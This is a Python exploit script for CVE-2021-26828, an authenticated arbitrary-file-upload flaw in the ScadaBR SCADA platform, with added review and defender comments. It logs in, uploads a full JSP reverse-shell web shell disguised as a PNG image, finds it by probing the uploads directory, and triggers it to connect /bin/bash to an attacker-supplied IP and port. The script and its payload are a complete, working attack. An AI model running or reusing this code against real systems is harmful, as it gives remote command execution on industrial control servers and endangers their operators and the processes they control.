#!/usr/bin/python3
import requests
import argparse
import time
import sys
def parse_args():
    """Parse the six positional command-line arguments and return the namespace.

    Positional order: target_ip, target_port, username, password,
    reverse_ip, reverse_port.  argparse prints usage and exits on a
    missing or extra argument.
    """
    cli = argparse.ArgumentParser(
        description="Exploit for CVE-2021-26828 in ScadaBR 1.0 ~ 1.1 CE."
    )
    # (argument name, help text) in the order they must be supplied.
    positional = (
        ("target_ip", "target ip address"),
        ("target_port", "target port"),
        ("username", "username for login"),
        ("password", "password for login"),
        ("reverse_ip", "ip address for reverse shell"),
        ("reverse_port", "port for reverse shell"),
    )
    for name, help_text in positional:
        cli.add_argument(name, help=help_text)
    return cli.parse_args()
# Banner printed by main() before any request is made.  Raw string so the
# backslashes in the box art are kept literally.
# NOTE(review): the interior spacing of the box art looks collapsed in this
# copy (the art lines are shorter than the border rows); verify against the
# original before relying on how it renders.
banner = r'''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ \______ \______ \ |
| \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ |
| / \ \___ / __ \_/ /_/ | / __ \| | \| | \ |
| /_______ /\___ >____ /\____ |(____ /______ /|____|_ / |
| \/ \/ \/ \/ \/ \/ \/ |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload (CVE-2021-26828) |
| > Original Exploit Author : Fellipe Oliveira |
| > Exploit for Linux Systems |
| > ported to python3 by void |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''
def main() -> None:
    """Run the CVE-2021-26828 upload flow against the target given on the command line.

    Steps, in order: authenticate to ScadaBR with the supplied credentials,
    upload the embedded JSP through the view_edit.shtm image-upload form,
    then probe /ScadaBR/uploads/<n>.jsp for n in 1..999 and request every
    hit with the reverse-shell query parameters.  Progress is printed;
    nothing is returned.

    Calls sys.exit(0) when the post-login check fails (note: the exit
    status is 0 even on that failure).
    """
    args = parse_args()
    print(banner)
    host = args.target_ip
    port = args.target_port
    username = args.username
    password = args.password
    rev_host = args.reverse_ip
    rev_port = args.reverse_port
    # One session so the cookie set by the login POST is reused by every
    # later request (the upload and the probes below).
    s = requests.session()
    login_url = f'http://{host}:{port}/ScadaBR/login.htm'
    print(f"[+] Trying to authenticate to {login_url}...")
    # Plain HTTP; credentials go as form fields.  The login response itself
    # is not inspected.
    s.post(
        url= login_url,
        data= {
            'username': username,
            'password': password
        }
    )
    # Login is judged only by the status code of a second page.  A server
    # that answers 200 with the login form instead of redirecting would also
    # pass this check -- cannot confirm from here.
    res = s.get( url= f'http://{host}:{port}/ScadaBR/view_edit.shtm' )
    if res.status_code == 200:
        print("[+] Successfully authenticated! :D")
    else:
        print("[x] Authentication failed :(")
        sys.exit(0)  # NOTE: exit status 0 despite the failure
    # Content of the file that gets uploaded.  It defines a thread that pumps
    # one stream into another and, when the 'ipaddress' and 'port' query
    # parameters are present, runs /bin/bash and wires it to a socket opened
    # to that address.  The literal is left byte-for-byte: it is the uploaded
    # file's content, and the form field names below are what the final GET
    # in this function relies on.
    jsp_revshell = '''
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread {
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os) {
this.is = is;
this.os = os;
}
public void run() {
BufferedReader isr = null;
BufferedWriter osw = null;
try {
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {
osw.write(buffer, 0, lenRead);
osw.flush();
}
} catch (Exception e) {
System.out.println("exception: " + e.getMessage());
}
try {
if (isr != null)
isr.close();
if (osw != null)
osw.close();
} catch (Exception e) {
System.out.println("exception: " + e.getMessage());
}
}
}
%>
<h1>Payload JSP to Reverse Shell</h1>
<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>
<form method="get">
IP Address<input type="text" name="ipaddress" size=30 value="127.0.0.1"/>
Port<input type="text" name="port" size=10 value="1234"/>
<input type="submit" name="Connect" value="Connect"/>
</form>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
Socket sock = null;
Process proc = null;
if (ipAddress != null && ipPort != null) {
try {
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
System.out.println("socket created: " + sock.toString());
Runtime rt = Runtime.getRuntime();
proc = rt.exec("/bin/bash");
System.out.println("process /bin/bash started: " + proc.toString());
StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());
System.out.println("outputConnector created: " + outputConnector.toString());
StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());
System.out.println("inputConnector created: " + inputConnector.toString());
outputConnector.start();
inputConnector.start();
} catch (Exception e) {
System.out.println("exception: " + e.getMessage());
}
}
if (sock != null && proc != null) {
out.println("<div class='separator'></div>");
out.println("<p>Process /bin/bash, running as (" + proc.toString() + "), is connected to socket " + sock.toString() + ".</p>");
}
%>
'''
    # The weakness being exercised: the image-upload field accepts a file
    # named *.jsp (declared here as image/png) and stores it under
    # /ScadaBR/uploads/, where the probe loop below expects to find it.
    # For defenders: a multipart POST to view_edit.shtm whose
    # 'backgroundImageMP' part carries a .jsp filename is the upload-side
    # indicator; a MIME type that disagrees with the extension is a second one.
    files = { 'backgroundImageMP': ( 'webshell.jsp', jsp_revshell, 'image/png' ) }
    data = {
        'view_name': '',
        'view_xid': 'GV_369755',  # hard-coded view id
        'upload': 'Upload image',
        'view.anonymousAccess': '0'
    }
    print('[>] Attempting to upload .jsp Webshell...')
    res = s.post(
        url= f"http://{host}:{port}/ScadaBR/view_edit.shtm",
        files= files,
        data= data
    )
    print('[>] Verifying shell upload...\n')
    # Upload success is inferred from the status code alone; the response
    # body is not read, so the stored file's number is unknown and has to be
    # discovered by probing.
    if res.status_code == 200:
        print('[+] Upload Successfuly! \n')
        # Sequential probe of /ScadaBR/uploads/1.jsp .. 999.jsp.  There is no
        # break, so every existing N.jsp answering 200 is requested again
        # with the parameters.  For defenders: a burst of GETs to
        # /ScadaBR/uploads/<n>.jsp from a single client right after an upload
        # is a distinctive access-log signature of this script.
        for num in range(1, 1000):
            jsp_revsh_path = f'http://{host}:{port}/ScadaBR/uploads/{num}.jsp'
            res = s.get( url= jsp_revsh_path )
            if res.status_code == 200:
                print(f'[+] Webshell Found in: {jsp_revsh_path}')
                print(f'[>] Spawning Reverse Shell ...')
                # Query keys match the form field names in the JSP above;
                # the values are interpolated without URL-encoding.
                s.get( url= f'{jsp_revsh_path}?ipaddress={rev_host}&port={rev_port}&Connect=Connect' )
# Script entry point: run only when executed directly, not when imported.
if __name__ == "__main__":
    main()